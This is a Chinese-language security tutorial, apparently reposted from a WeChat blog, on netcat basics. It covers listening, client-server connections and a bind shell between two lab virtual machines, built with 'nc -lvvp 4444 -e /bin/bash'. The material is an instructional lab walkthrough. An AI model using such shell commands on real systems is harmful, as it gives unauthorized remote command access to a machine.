nc的基本操作和反弹shell【收藏】

admin 2022年7月5日10:47:39评论57 views字数 1186阅读3分57秒阅读模式

一、nc简介

  1. nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。

  2. 可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP

  3. 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。

二、nc常用参数

-l 开启监听
-p 指定一个端口
-v 显示详细输出
-e 指定对应的应用程序
-n nc不要DNS反向查询IP的域名
-z 连接成功后立即关闭连接

三、建立C-S连接

1 环境:
    目的在于实现client输入的内容同样显示在server的终端上

clientCentOS7  192.168.43.186
serverkali   192.168.43.19


(两台主机之间可以互相ping通)
在server端kali虚拟机上开启监听4444端口:

nc -lvvp 4444

nc的基本操作和反弹shell【收藏】

在client端虚拟机上执行如下命令后并随便键入命令(如下图所示):

nc -v  192.168.43.19 4444

nc的基本操作和反弹shell【收藏】
nc的基本操作和反弹shell【收藏】

四、正向反弹shell

环境:

目的在于实现kali的shell反弹到CentOS7的终端上,并可在CentOS7上执行命令操作kali

kali监听端口、选择对应的程序,CentOS7连接kali

CentOS7 192.168.43.186

kali 192.168.43.19

步骤:

在kali上执行:

nc -lvvp 4444 -e /bin/bash

nc的基本操作和反弹shell【收藏】

在CentOS7上执行:

nc 192.168.43.19 4444

nc的基本操作和反弹shell【收藏】
链接成功
nc的基本操作和反弹shell【收藏】

原文链接:https://blog.csdn.net/weixin_46789316/article/details/116562234?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-4.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-4.pc_relevant_default&utm_relevant_index=7

推荐阅读

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF


查看更多精彩内容,还请关注橘猫学安全

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看nc的基本操作和反弹shell【收藏】

原文始发于微信公众号(橘猫学安全):nc的基本操作和反弹shell【收藏】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月5日10:47:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nc的基本操作和反弹shell【收藏】http://cn-sec.com/archives/1154817.html

发表评论

匿名网友 填写信息